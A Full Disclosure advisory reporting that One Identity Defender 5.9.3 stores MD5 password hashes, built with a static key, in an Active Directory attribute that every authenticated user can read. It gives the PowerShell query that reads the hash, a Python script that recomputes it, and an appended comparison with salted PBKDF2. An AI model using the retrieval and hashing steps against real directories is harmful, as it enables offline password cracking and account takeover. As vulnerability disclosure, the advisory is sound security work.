Message-ID: <rVpSZ-Rm6irZbmRa-kjVrb3j15fQnjVDPlfvweT-N1oF3eCKkIGNejdOLptjfY4KEJZJUeKmaQnF-ZnS6qfplekKMUdxomlDHHoMzkh9uBE=@protonmail.com>
Date: Sun, 01 Sep 2019 22:26:04 +0000
From: spicyitalian--- via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] One Identity Defender - Insecure Cryptographic Storage
Title: One Identity Defender - Insecure Cryptographic Storage
Date: 01 September 2019
Affected Software:
==================
One Identity Defender 5.9.3
Other versions are likely also vulnerable.
Insecure Cryptographic Storage:
==============================
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed with MD5 together with a static key used for obfuscation. The computed hash can therefore be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute-force attack.
Hash Retrieval:
PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData
DistinguishedName ObjectGUID defender-userTokenData
----------------- ---------- ----------------------
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...
Hash Calculation:
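#!/usr/bin/env python3
import binascii
import hashlib

guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'  # ObjectGUID from the Get-ADUser output above
password = 'secret'                             # password being hashed
key = '45f88b08118bf03b8d55e452f77c2e8b'        # static obfuscation key

# Strip the dashes and decode the GUID to its 16 raw bytes.
guid = binascii.unhexlify(guid.translate(str.maketrans('', '', '-')))
# Reorder to the mixed-endian layout: the first three fields are byte-swapped.
guid = binascii.unhexlify(b''.join(map(binascii.hexlify, (guid[3::-1], guid[5:3:-1], guid[7:5:-1], guid[8:]))))
# Append a NUL byte after every character of the password.
password = ('\00'.join([password[i:i+1] for i in range(0, len(password)+1, 1)])).encode()
# MD5 over key || password || GUID.
data = binascii.unhexlify(key) + password + guid
print(hashlib.md5(data).hexdigest())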
[duras@...os ~]$ ./hash.py
d1f541f69c63315dd85fbbdb7b4dc9e5
Contact:
========
spicyitalian[at]protonmail[dot]com
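
As an added example (not part of the original advisory and not One Identity's code), the block below puts the construction from the script above beside a salted, iterated alternative built on PBKDF2-HMAC-SHA256. The function names, record layout and iteration count are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os
import uuid

# Static key exactly as it appears in the advisory's script.
STATIC_KEY = bytes.fromhex("45f88b08118bf03b8d55e452f77c2e8b")


def legacy_hash(password: str, object_guid: str) -> str:
    """Construction from the advisory: MD5(key || password || GUID).

    One fast MD5 call. The key is static and the GUID is readable in the
    directory, so neither slows down guessing.
    """
    guid_le = uuid.UUID(object_guid).bytes_le  # same byte order as the script
    # UTF-16LE matches the script's NUL interleaving for ASCII passwords.
    data = STATIC_KEY + password.encode("utf-16-le") + guid_le
    return hashlib.md5(data).hexdigest()


# Assumed work factor for this example; raise it as hardware allows.
PBKDF2_ITERATIONS = 600_000


def hardened_record(password: str, iterations: int = PBKDF2_ITERATIONS) -> dict:
    """Hypothetical replacement record: random per-record salt, slow KDF."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    # Salt and iteration count are stored with the digest so the cost can be
    # raised later without invalidating existing records.
    return {"salt": salt, "iterations": iterations, "digest": digest}


def hardened_verify(password: str, record: dict) -> bool:
    """Recompute with the stored parameters and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(candidate, record["digest"])


if __name__ == "__main__":
    guid = "52126f3a-723d-4b7e-a6ae-ccc2279e8618"  # GUID from the advisory
    print("legacy  :", legacy_hash("secret", guid))
    rec = hardened_record("secret")
    print("hardened:", rec["digest"].hex(), hardened_verify("secret", rec))
```

A slow KDF only raises the cost of each guess; the attribute still needs an ACL that stops ordinary authenticated users from reading it.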